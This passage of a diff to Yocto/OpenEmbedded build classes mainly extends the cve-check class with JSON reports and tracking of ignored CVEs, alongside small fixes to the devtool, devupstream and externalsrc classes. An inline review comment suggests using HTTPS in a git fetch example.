109python cve_check_cleanup () { 162python cve_check_cleanup () {
@@ -111,10 +164,11 @@ python cve_check_cleanup () {
111 Delete the file used to gather all the CVE information. 164 Delete the file used to gather all the CVE information.
112 """ 165 """
113 bb.utils.remove(e.data.getVar("CVE_CHECK_TMP_FILE")) 166 bb.utils.remove(e.data.getVar("CVE_CHECK_TMP_FILE"))
167 bb.utils.remove(e.data.getVar("CVE_CHECK_SUMMARY_INDEX_PATH"))
114} 168}
115 169
116addhandler cve_check_cleanup 170addhandler cve_check_cleanup
117cve_check_cleanup[eventmask] = "bb.cooker.CookerExit" 171cve_check_cleanup[eventmask] = "bb.event.BuildCompleted"
118 172
119python cve_check_write_rootfs_manifest () { 173python cve_check_write_rootfs_manifest () {
120 """ 174 """
@@ -122,115 +176,107 @@ python cve_check_write_rootfs_manifest () {
122 """ 176 """
123 177
124 import shutil 178 import shutil
179 import json
180 from oe.rootfs import image_list_installed_packages
181 from oe.cve_check import cve_check_merge_jsons, update_symlinks
125 182
126 if d.getVar("CVE_CHECK_COPY_FILES") == "1": 183 if d.getVar("CVE_CHECK_COPY_FILES") == "1":
127 deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE") 184 deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
128 if os.path.exists(deploy_file): 185 if os.path.exists(deploy_file):
129 bb.utils.remove(deploy_file) 186 bb.utils.remove(deploy_file)
130 187 deploy_file_json = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
131 if os.path.exists(d.getVar("CVE_CHECK_TMP_FILE")): 188 if os.path.exists(deploy_file_json):
132 bb.note("Writing rootfs CVE manifest") 189 bb.utils.remove(deploy_file_json)
133 deploy_dir = d.getVar("DEPLOY_DIR_IMAGE") 190
134 link_name = d.getVar("IMAGE_LINK_NAME") 191 # Create a list of relevant recipies
192 recipies = set()
193 for pkg in list(image_list_installed_packages(d)):
194 pkg_info = os.path.join(d.getVar('PKGDATA_DIR'),
195 'runtime-reverse', pkg)
196 pkg_data = oe.packagedata.read_pkgdatafile(pkg_info)
197 recipies.add(pkg_data["PN"])
198
199 bb.note("Writing rootfs CVE manifest")
200 deploy_dir = d.getVar("IMGDEPLOYDIR")
201 link_name = d.getVar("IMAGE_LINK_NAME")
202
203 json_data = {"version":"1", "package": []}
204 text_data = ""
205 enable_json = d.getVar("CVE_CHECK_FORMAT_JSON") == "1"
206 enable_text = d.getVar("CVE_CHECK_FORMAT_TEXT") == "1"
207
208 save_pn = d.getVar("PN")
209
210 for pkg in recipies:
211 # To be able to use the CVE_CHECK_RECIPE_FILE variable we have to evaluate
212 # it with the different PN names set each time.
213 d.setVar("PN", pkg)
214 if enable_text:
215 pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE")
216 if os.path.exists(pkgfilepath):
217 with open(pkgfilepath) as pfile:
218 text_data += pfile.read()
219
220 if enable_json:
221 pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
222 if os.path.exists(pkgfilepath):
223 with open(pkgfilepath) as j:
224 data = json.load(j)
225 cve_check_merge_jsons(json_data, data)
226
227 d.setVar("PN", save_pn)
228
229 if enable_text:
230 link_path = os.path.join(deploy_dir, "%s.cve" % link_name)
135 manifest_name = d.getVar("CVE_CHECK_MANIFEST") 231 manifest_name = d.getVar("CVE_CHECK_MANIFEST")
136 cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
137
138 shutil.copyfile(cve_tmp_file, manifest_name)
139 232
140 if manifest_name and os.path.exists(manifest_name): 233 with open(manifest_name, "w") as f:
141 manifest_link = os.path.join(deploy_dir, "%s.cve" % link_name) 234 f.write(text_data)
142 # If we already have another manifest, update symlinks
143 if os.path.exists(os.path.realpath(manifest_link)):
144 os.remove(manifest_link)
145 os.symlink(os.path.basename(manifest_name), manifest_link)
146 bb.plain("Image CVE report stored in: %s" % manifest_name)
147}
148
149ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
150do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
151 235
152def get_patches_cves(d): 236 update_symlinks(manifest_name, link_path)
153 """ 237 bb.plain("Image CVE report stored in: %s" % manifest_name)
154 Get patches that solve CVEs using the "CVE: " tag.
155 """
156 238
157 import re 239 if enable_json:
240 link_path = os.path.join(deploy_dir, "%s.json" % link_name)
241 manifest_name = d.getVar("CVE_CHECK_MANIFEST_JSON")
158 242
159 pn = d.getVar("PN") 243 with open(manifest_name, "w") as f:
160 cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+") 244 json.dump(json_data, f, indent=2)
161
162 # Matches last CVE-1234-211432 in the file name, also if written
163 # with small letters. Not supporting multiple CVE id's in a single
164 # file name.
165 cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
166
167 patched_cves = set()
168 bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
169 for url in src_patches(d):
170 patch_file = bb.fetch.decodeurl(url)[2]
171
172 if not os.path.isfile(patch_file):
173 bb.error("File Not found: %s" % patch_file)
174 raise FileNotFoundError
175
176 # Check patch file name for CVE ID
177 fname_match = cve_file_name_match.search(patch_file)
178 if fname_match:
179 cve = fname_match.group(1).upper()
180 patched_cves.add(cve)
181 bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
182
183 with open(patch_file, "r", encoding="utf-8") as f:
184 try:
185 patch_text = f.read()
186 except UnicodeDecodeError:
187 bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
188 " trying with iso8859-1" % patch_file)
189 f.close()
190 with open(patch_file, "r", encoding="iso8859-1") as f:
191 patch_text = f.read()
192
193 # Search for one or more "CVE: " lines
194 text_match = False
195 for match in cve_match.finditer(patch_text):
196 # Get only the CVEs without the "CVE: " tag
197 cves = patch_text[match.start()+5:match.end()]
198 for cve in cves.split():
199 bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
200 patched_cves.add(cve)
201 text_match = True
202 245
203 if not fname_match and not text_match: 246 update_symlinks(manifest_name, link_path)
204 bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file) 247 bb.plain("Image CVE JSON report stored in: %s" % manifest_name)
248}
205 249
206 return patched_cves 250ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
251do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
252do_populate_sdk[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
207 253
208def check_cves(d, patched_cves): 254def check_cves(d, patched_cves):
209 """ 255 """
210 Connect to the NVD database and find unpatched cves. 256 Connect to the NVD database and find unpatched cves.
211 """ 257 """
212 from oe.cve_check import Version 258 from oe.cve_check import Version, convert_cve_version
213 259
214 pn = d.getVar("PN") 260 pn = d.getVar("PN")
215 real_pv = d.getVar("PV") 261 real_pv = d.getVar("PV")
216 suffix = d.getVar("CVE_VERSION_SUFFIX") 262 suffix = d.getVar("CVE_VERSION_SUFFIX")
217 263
218 cves_unpatched = [] 264 cves_unpatched = []
265 cves_ignored = []
266 cves_status = []
267 cves_in_recipe = False
219 # CVE_PRODUCT can contain more than one product (eg. curl/libcurl) 268 # CVE_PRODUCT can contain more than one product (eg. curl/libcurl)
220 products = d.getVar("CVE_PRODUCT").split() 269 products = d.getVar("CVE_PRODUCT").split()
221 # If this has been unset then we're not scanning for CVEs here (for example, image recipes) 270 # If this has been unset then we're not scanning for CVEs here (for example, image recipes)
222 if not products: 271 if not products:
223 return ([], [], []) 272 return ([], [], [], [])
224 pv = d.getVar("CVE_VERSION").split("+git")[0] 273 pv = d.getVar("CVE_VERSION").split("+git")[0]
225 274
226 # If the recipe has been whitlisted we return empty lists 275 # If the recipe has been whitelisted we return empty lists
227 if pn in d.getVar("CVE_CHECK_PN_WHITELIST").split(): 276 if pn in d.getVar("CVE_CHECK_PN_WHITELIST").split():
228 bb.note("Recipe has been whitelisted, skipping check") 277 bb.note("Recipe has been whitelisted, skipping check")
229 return ([], [], []) 278 return ([], [], [], [])
230 279
231 old_cve_whitelist = d.getVar("CVE_CHECK_CVE_WHITELIST")
232 if old_cve_whitelist:
233 bb.warn("CVE_CHECK_CVE_WHITELIST is deprecated, please use CVE_CHECK_WHITELIST.")
234 cve_whitelist = d.getVar("CVE_CHECK_WHITELIST").split() 280 cve_whitelist = d.getVar("CVE_CHECK_WHITELIST").split()
235 281
236 import sqlite3 282 import sqlite3
@@ -239,28 +285,42 @@ def check_cves(d, patched_cves):
239 285
240 # For each of the known product names (e.g. curl has CPEs using curl and libcurl)... 286 # For each of the known product names (e.g. curl has CPEs using curl and libcurl)...
241 for product in products: 287 for product in products:
288 cves_in_product = False
242 if ":" in product: 289 if ":" in product:
243 vendor, product = product.split(":", 1) 290 vendor, product = product.split(":", 1)
244 else: 291 else:
245 vendor = "%" 292 vendor = "%"
246 293
247 # Find all relevant CVE IDs. 294 # Find all relevant CVE IDs.
248 for cverow in conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor)): 295 cve_cursor = conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor))
296 for cverow in cve_cursor:
249 cve = cverow[0] 297 cve = cverow[0]
250 298
251 if cve in cve_whitelist: 299 if cve in cve_whitelist:
252 bb.note("%s-%s has been whitelisted for %s" % (product, pv, cve)) 300 bb.note("%s-%s has been whitelisted for %s" % (product, pv, cve))
253 # TODO: this should be in the report as 'whitelisted' 301 cves_ignored.append(cve)
254 patched_cves.add(cve)
255 continue 302 continue
256 elif cve in patched_cves: 303 elif cve in patched_cves:
257 bb.note("%s has been patched" % (cve)) 304 bb.note("%s has been patched" % (cve))
258 continue 305 continue
306 # Write status once only for each product
307 if not cves_in_product:
308 cves_status.append([product, True])
309 cves_in_product = True
310 cves_in_recipe = True
259 311
260 vulnerable = False 312 vulnerable = False
261 for row in conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor)): 313 ignored = False
314
315 product_cursor = conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor))
316 for row in product_cursor:
262 (_, _, _, version_start, operator_start, version_end, operator_end) = row 317 (_, _, _, version_start, operator_start, version_end, operator_end) = row
263 #bb.debug(2, "Evaluating row " + str(row)) 318 #bb.debug(2, "Evaluating row " + str(row))
319 if cve in cve_whitelist:
320 ignored = True
321
322 version_start = convert_cve_version(version_start)
323 version_end = convert_cve_version(version_end)
264 324
265 if (operator_start == '=' and pv == version_start) or version_start == '-': 325 if (operator_start == '=' and pv == version_start) or version_start == '-':
266 vulnerable = True 326 vulnerable = True
@@ -293,18 +353,27 @@ def check_cves(d, patched_cves):
293 vulnerable = vulnerable_start or vulnerable_end 353 vulnerable = vulnerable_start or vulnerable_end
294 354
295 if vulnerable: 355 if vulnerable:
296 bb.note("%s-%s is vulnerable to %s" % (pn, real_pv, cve)) 356 if ignored:
297 cves_unpatched.append(cve) 357 bb.note("%s is ignored in %s-%s" % (cve, pn, real_pv))
358 cves_ignored.append(cve)
359 else:
360 bb.note("%s-%s is vulnerable to %s" % (pn, real_pv, cve))
361 cves_unpatched.append(cve)
298 break 362 break
363 product_cursor.close()
299 364
300 if not vulnerable: 365 if not vulnerable:
301 bb.note("%s-%s is not vulnerable to %s" % (pn, real_pv, cve)) 366 bb.note("%s-%s is not vulnerable to %s" % (pn, real_pv, cve))
302 # TODO: not patched but not vulnerable
303 patched_cves.add(cve) 367 patched_cves.add(cve)
368 cve_cursor.close()
369
370 if not cves_in_product:
371 bb.note("No CVE records found for product %s, pn %s" % (product, pn))
372 cves_status.append([product, False])
304 373
305 conn.close() 374 conn.close()
306 375
307 return (list(cve_whitelist), list(patched_cves), cves_unpatched) 376 return (list(cves_ignored), list(patched_cves), cves_unpatched, cves_status)
308 377
309def get_cve_info(d, cves): 378def get_cve_info(d, cves):
310 """ 379 """
@@ -314,21 +383,23 @@ def get_cve_info(d, cves):
314 import sqlite3 383 import sqlite3
315 384
316 cve_data = {} 385 cve_data = {}
317 conn = sqlite3.connect(d.getVar("CVE_CHECK_DB_FILE")) 386 db_file = d.expand("file:${CVE_CHECK_DB_FILE}?mode=ro")
387 conn = sqlite3.connect(db_file, uri=True)
318 388
319 for cve in cves: 389 for cve in cves:
320 for row in conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,)): 390 cursor = conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,))
391 for row in cursor:
321 cve_data[row[0]] = {} 392 cve_data[row[0]] = {}
322 cve_data[row[0]]["summary"] = row[1] 393 cve_data[row[0]]["summary"] = row[1]
323 cve_data[row[0]]["scorev2"] = row[2] 394 cve_data[row[0]]["scorev2"] = row[2]
324 cve_data[row[0]]["scorev3"] = row[3] 395 cve_data[row[0]]["scorev3"] = row[3]
325 cve_data[row[0]]["modified"] = row[4] 396 cve_data[row[0]]["modified"] = row[4]
326 cve_data[row[0]]["vector"] = row[5] 397 cve_data[row[0]]["vector"] = row[5]
327 398 cursor.close()
328 conn.close() 399 conn.close()
329 return cve_data 400 return cve_data
330 401
331def cve_write_data(d, patched, unpatched, whitelisted, cve_data): 402def cve_write_data_text(d, patched, unpatched, whitelisted, cve_data):
332 """ 403 """
333 Write CVE information in WORKDIR; and to CVE_CHECK_DIR, and 404 Write CVE information in WORKDIR; and to CVE_CHECK_DIR, and
334 CVE manifest if enabled. 405 CVE manifest if enabled.
@@ -338,20 +409,38 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
338 fdir_name = d.getVar("FILE_DIRNAME") 409 fdir_name = d.getVar("FILE_DIRNAME")
339 layer = fdir_name.split("/")[-3] 410 layer = fdir_name.split("/")[-3]
340 411
341 nvd_link = "https://web.nvd.nist.gov/view/vuln/detail?vulnId=" 412 include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
413 exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
414
415 report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
416
417 if exclude_layers and layer in exclude_layers:
418 return
419
420 if include_layers and layer not in include_layers:
421 return
422
423 # Early exit, the text format does not report packages without CVEs
424 if not patched+unpatched+whitelisted:
425 return
426
427 nvd_link = "https://nvd.nist.gov/vuln/detail/"
342 write_string = "" 428 write_string = ""
343 unpatched_cves = [] 429 unpatched_cves = []
344 bb.utils.mkdirhier(os.path.dirname(cve_file)) 430 bb.utils.mkdirhier(os.path.dirname(cve_file))
345 431
346 for cve in sorted(cve_data): 432 for cve in sorted(cve_data):
347 is_patched = cve in patched 433 is_patched = cve in patched
348 if is_patched and (d.getVar("CVE_CHECK_REPORT_PATCHED") != "1"): 434 is_ignored = cve in whitelisted
435
436 if (is_patched or is_ignored) and not report_all:
349 continue 437 continue
438
350 write_string += "LAYER: %s\n" % layer 439 write_string += "LAYER: %s\n" % layer
351 write_string += "PACKAGE NAME: %s\n" % d.getVar("PN") 440 write_string += "PACKAGE NAME: %s\n" % d.getVar("PN")
352 write_string += "PACKAGE VERSION: %s%s\n" % (d.getVar("EXTENDPE"), d.getVar("PV")) 441 write_string += "PACKAGE VERSION: %s%s\n" % (d.getVar("EXTENDPE"), d.getVar("PV"))
353 write_string += "CVE: %s\n" % cve 442 write_string += "CVE: %s\n" % cve
354 if cve in whitelisted: 443 if is_ignored:
355 write_string += "CVE STATUS: Whitelisted\n" 444 write_string += "CVE STATUS: Whitelisted\n"
356 elif is_patched: 445 elif is_patched:
357 write_string += "CVE STATUS: Patched\n" 446 write_string += "CVE STATUS: Patched\n"
@@ -364,23 +453,138 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
364 write_string += "VECTOR: %s\n" % cve_data[cve]["vector"] 453 write_string += "VECTOR: %s\n" % cve_data[cve]["vector"]
365 write_string += "MORE INFORMATION: %s%s\n\n" % (nvd_link, cve) 454 write_string += "MORE INFORMATION: %s%s\n\n" % (nvd_link, cve)
366 455
367 if unpatched_cves: 456 if unpatched_cves and d.getVar("CVE_CHECK_SHOW_WARNINGS") == "1":
368 bb.warn("Found unpatched CVE (%s), for more information check %s" % (" ".join(unpatched_cves),cve_file)) 457 bb.warn("Found unpatched CVE (%s), for more information check %s" % (" ".join(unpatched_cves),cve_file))
369 458
370 if write_string: 459 with open(cve_file, "w") as f:
371 with open(cve_file, "w") as f: 460 bb.note("Writing file %s with CVE information" % cve_file)
372 bb.note("Writing file %s with CVE information" % cve_file) 461 f.write(write_string)
462
463 if d.getVar("CVE_CHECK_COPY_FILES") == "1":
464 deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
465 bb.utils.mkdirhier(os.path.dirname(deploy_file))
466 with open(deploy_file, "w") as f:
467 f.write(write_string)
468
469 if d.getVar("CVE_CHECK_CREATE_MANIFEST") == "1":
470 cvelogpath = d.getVar("CVE_CHECK_SUMMARY_DIR")
471 bb.utils.mkdirhier(cvelogpath)
472
473 with open(d.getVar("CVE_CHECK_TMP_FILE"), "a") as f:
474 f.write("%s" % write_string)
475
476def cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file):
477 """
478 Write CVE information in the JSON format: to WORKDIR; and to
479 CVE_CHECK_DIR, if CVE manifest if enabled, write fragment
480 files that will be assembled at the end in cve_check_write_rootfs_manifest.
481 """
482
483 import json
484
485 write_string = json.dumps(output, indent=2)
486 with open(direct_file, "w") as f:
487 bb.note("Writing file %s with CVE information" % direct_file)
488 f.write(write_string)
489
490 if d.getVar("CVE_CHECK_COPY_FILES") == "1":
491 bb.utils.mkdirhier(os.path.dirname(deploy_file))
492 with open(deploy_file, "w") as f:
493 f.write(write_string)
494
495 if d.getVar("CVE_CHECK_CREATE_MANIFEST") == "1":
496 cvelogpath = d.getVar("CVE_CHECK_SUMMARY_DIR")
497 index_path = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
498 bb.utils.mkdirhier(cvelogpath)
499 fragment_file = os.path.basename(deploy_file)
500 fragment_path = os.path.join(cvelogpath, fragment_file)
501 with open(fragment_path, "w") as f:
373 f.write(write_string) 502 f.write(write_string)
503 with open(index_path, "a+") as f:
504 f.write("%s\n" % fragment_path)
505
506def cve_write_data_json(d, patched, unpatched, ignored, cve_data, cve_status):
507 """
508 Prepare CVE data for the JSON format, then write it.
509 """
510
511 output = {"version":"1", "package": []}
512 nvd_link = "https://nvd.nist.gov/vuln/detail/"
513
514 fdir_name = d.getVar("FILE_DIRNAME")
515 layer = fdir_name.split("/")[-3]
516
517 include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
518 exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
519
520 report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
521
522 if exclude_layers and layer in exclude_layers:
523 return
524
525 if include_layers and layer not in include_layers:
526 return
527
528 unpatched_cves = []
529
530 product_data = []
531 for s in cve_status:
532 p = {"product": s[0], "cvesInRecord": "Yes"}
533 if s[1] == False:
534 p["cvesInRecord"] = "No"
535 product_data.append(p)
536
537 package_version = "%s%s" % (d.getVar("EXTENDPE"), d.getVar("PV"))
538 package_data = {
539 "name" : d.getVar("PN"),
540 "layer" : layer,
541 "version" : package_version,
542 "products": product_data
543 }
544 cve_list = []
545
546 for cve in sorted(cve_data):
547 is_patched = cve in patched
548 is_ignored = cve in ignored
549 status = "Unpatched"
550 if (is_patched or is_ignored) and not report_all:
551 continue
552 if is_ignored:
553 status = "Ignored"
554 elif is_patched:
555 status = "Patched"
556 else:
557 # default value of status is Unpatched
558 unpatched_cves.append(cve)
559
560 issue_link = "%s%s" % (nvd_link, cve)
374 561
375 if d.getVar("CVE_CHECK_COPY_FILES") == "1": 562 cve_item = {
376 deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE") 563 "id" : cve,
377 bb.utils.mkdirhier(os.path.dirname(deploy_file)) 564 "summary" : cve_data[cve]["summary"],
378 with open(deploy_file, "w") as f: 565 "scorev2" : cve_data[cve]["scorev2"],
379 f.write(write_string) 566 "scorev3" : cve_data[cve]["scorev3"],
567 "vector" : cve_data[cve]["vector"],
568 "status" : status,
569 "link": issue_link
570 }
571 cve_list.append(cve_item)
380 572
381 if d.getVar("CVE_CHECK_CREATE_MANIFEST") == "1": 573 package_data["issue"] = cve_list
382 cvelogpath = d.getVar("CVE_CHECK_SUMMARY_DIR") 574 output["package"].append(package_data)
383 bb.utils.mkdirhier(cvelogpath) 575
576 direct_file = d.getVar("CVE_CHECK_LOG_JSON")
577 deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
578 manifest_file = d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON")
579
580 cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file)
581
582def cve_write_data(d, patched, unpatched, ignored, cve_data, status):
583 """
584 Write CVE data in each enabled format.
585 """
384 586
385 with open(d.getVar("CVE_CHECK_TMP_FILE"), "a") as f: 587 if d.getVar("CVE_CHECK_FORMAT_TEXT") == "1":
386 f.write("%s" % write_string) 588 cve_write_data_text(d, patched, unpatched, ignored, cve_data)
589 if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
590 cve_write_data_json(d, patched, unpatched, ignored, cve_data, status)
diff --git a/meta/classes/devshell.bbclass b/meta/classes/devshell.bbclass
index fdf7dc100f..76dd0b42ee 100644
--- a/meta/classes/devshell.bbclass
+++ b/meta/classes/devshell.bbclass
@@ -128,6 +128,7 @@ def devpyshell(d):
128 more = i.runsource(source, "<pyshell>") 128 more = i.runsource(source, "<pyshell>")
129 if not more: 129 if not more:
130 buf = [] 130 buf = []
131 sys.stderr.flush()
131 prompt(more) 132 prompt(more)
132 except KeyboardInterrupt: 133 except KeyboardInterrupt:
133 i.write("\nKeyboardInterrupt\n") 134 i.write("\nKeyboardInterrupt\n")
diff --git a/meta/classes/devtool-source.bbclass b/meta/classes/devtool-source.bbclass
index 280d6009f3..41900e651f 100644
--- a/meta/classes/devtool-source.bbclass
+++ b/meta/classes/devtool-source.bbclass
@@ -199,6 +199,7 @@ python devtool_post_patch() {
199 # Run do_patch function with the override applied 199 # Run do_patch function with the override applied
200 localdata = bb.data.createCopy(d) 200 localdata = bb.data.createCopy(d)
201 localdata.setVar('OVERRIDES', ':'.join(no_overrides)) 201 localdata.setVar('OVERRIDES', ':'.join(no_overrides))
202 localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides))
202 bb.build.exec_func('do_patch', localdata) 203 bb.build.exec_func('do_patch', localdata)
203 rm_patches() 204 rm_patches()
204 # Now we need to reconcile the dev branch with the no-overrides one 205 # Now we need to reconcile the dev branch with the no-overrides one
@@ -216,7 +217,8 @@ python devtool_post_patch() {
216 # Reset back to the initial commit on a new branch 217 # Reset back to the initial commit on a new branch
217 bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir) 218 bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir)
218 # Run do_patch function with the override applied 219 # Run do_patch function with the override applied
219 localdata.appendVar('OVERRIDES', ':%s' % override) 220 localdata.setVar('OVERRIDES', ':'.join(no_overrides + [override]))
221 localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides + [override]))
220 bb.build.exec_func('do_patch', localdata) 222 bb.build.exec_func('do_patch', localdata)
221 rm_patches() 223 rm_patches()
222 # Now we need to reconcile the new branch with the no-overrides one 224 # Now we need to reconcile the new branch with the no-overrides one
diff --git a/meta/classes/devupstream.bbclass b/meta/classes/devupstream.bbclass
index 7780c5482c..97e137cb40 100644
--- a/meta/classes/devupstream.bbclass
+++ b/meta/classes/devupstream.bbclass
@@ -4,7 +4,7 @@
4# 4#
5# Usage: 5# Usage:
6# BBCLASSEXTEND = "devupstream:target" 6# BBCLASSEXTEND = "devupstream:target"
7# SRC_URI_class-devupstream = "git://git.example.com/example" 7# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master"
8# SRCREV_class-devupstream = "abcdef" 8# SRCREV_class-devupstream = "abcdef"
9# 9#
10# If the first entry in SRC_URI is a git: URL then S is rewritten to 10# If the first entry in SRC_URI is a git: URL then S is rewritten to
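Review bot: The usage example in the header comment shows a `git://` SRC_URI with no `protocol=` parameter, which, as far as I know, makes the fetcher use the unauthenticated, cleartext git protocol for any URL that names a host. Since the line is already being edited to add `branch=`, the example could show an authenticated transport too: `# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master;protocol=https"`. Recipes copied from the example would then not default to a cleartext fetch.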
diff --git a/meta/classes/externalsrc.bbclass b/meta/classes/externalsrc.bbclass
index 1d7300d65b..9c9451e528 100644
--- a/meta/classes/externalsrc.bbclass
+++ b/meta/classes/externalsrc.bbclass
@@ -60,7 +60,7 @@ python () {
60 if externalsrcbuild: 60 if externalsrcbuild:
61 d.setVar('B', externalsrcbuild) 61 d.setVar('B', externalsrcbuild)
62 else: 62 else:
63 d.setVar('B', '${WORKDIR}/${BPN}-${PV}/') 63 d.setVar('B', '${WORKDIR}/${BPN}-${PV}')
64 64
65 local_srcuri = [] 65 local_srcuri = []
66 fetch = bb.fetch2.Fetch((d.getVar('SRC_URI') or '').split(), d) 66 fetch = bb.fetch2.Fetch((d.getVar('SRC_URI') or '').split(), d)
@@ -108,6 +108,15 @@ python () {
108 if local_srcuri and task in fetch_tasks: 108 if local_srcuri and task in fetch_tasks:
109 continue 109 continue
110 bb.build.deltask(task, d) 110 bb.build.deltask(task, d)
111 if bb.data.inherits_class('reproducible_build', d) and task == 'do_unpack':
112 # The reproducible_build's create_source_date_epoch_stamp function must
113 # be run after the source is available and before the
114 # do_deploy_source_date_epoch task. In the normal case, it's attached
115 # to do_unpack as a postfuncs, but since we removed do_unpack (above)
116 # we need to move the function elsewhere. The easiest thing to do is
117 # move it into the prefuncs of the do_deploy_source_date_epoch task.
118 # This is safe, as externalsrc runs with the source already unpacked.
119 d.prependVarFlag('do_deploy_source_date_epoch', 'prefuncs', 'create_source_date_epoch_stamp ')
111 120
112 d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ") 121 d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ")
113 d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ") 122 d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ")
@@ -198,8 +207,8 @@ def srctree_hash_files(d, srcdir=None):
198 try: 207 try:
199 git_dir = os.path.join(s_dir, 208 git_dir = os.path.join(s_dir,
200 subprocess.check_output(['git', '-C', s_dir, 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip()) 209 subprocess.check_output(['git', '-C', s_dir, 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
201 top_git_dir = os.path.join(s_dir, subprocess.check_output(['git', '-C', d.getVar("TOPDIR"), 'rev-parse', '--git-dir'], 210 top_git_dir = os.path.join(d.getVar("TOPDIR"),
202 stderr=subprocess.DEVNULL).decode("utf-8").rstrip()) 211 subprocess.check_output(['git', '-C', d.getVar("TOPDIR"), 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
203 if git_dir == top_git_dir: 212 if git_dir == top_git_dir:
204 git_dir = None 213 git_dir = None
205 except subprocess.CalledProcessError: 214 except subprocess.CalledProcessError:
@@ -216,14 +225,16 @@ def srctree_hash_files(d, srcdir=None):
216 env['GIT_INDEX_FILE'] = tmp_index.name 225 env['GIT_INDEX_FILE'] = tmp_index.name
217 subprocess.check_output(['git', 'add', '-A', '.'], cwd=s_dir, env=env) 226 subprocess.check_output(['git', 'add', '-A', '.'], cwd=s_dir, env=env)
218 git_sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8") 227 git_sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8")
219 submodule_helper = subprocess.check_output(['git', 'submodule--helper', 'list'], cwd=s_dir, env=env).decode("utf-8") 228 if os.path.exists(os.path.join(s_dir, ".gitmodules")) and os.path.getsize(os.path.join(s_dir, ".gitmodules")) > 0:
220 for line in submodule_helper.splitlines(): 229 submodule_helper = subprocess.check_output(["git", "config", "--file", ".gitmodules", "--get-regexp", "path"], cwd=s_dir, env=env).decode("utf-8")
221 module_dir = os.path.join(s_dir, line.rsplit(maxsplit=1)[1]) 230 for line in submodule_helper.splitlines():
222 proc = subprocess.Popen(['git', 'add', '-A', '.'], cwd=module_dir, env=env, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 231 module_dir = os.path.join(s_dir, line.rsplit(maxsplit=1)[1])
223 proc.communicate() 232 if os.path.isdir(module_dir):
224 proc = subprocess.Popen(['git', 'write-tree'], cwd=module_dir, env=env, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL) 233 proc = subprocess.Popen(['git', 'add', '-A', '.'], cwd=module_dir, env=env, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
225 stdout, _ = proc.communicate() 234 proc.communicate()
226 git_sha1 += stdout.decode("utf-8") 235 proc = subprocess.Popen(['git', 'write-tree'], cwd=module_dir, env=env, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
236 stdout, _ = proc.communicate()
237 git_sha1 += stdout.decode("utf-8")
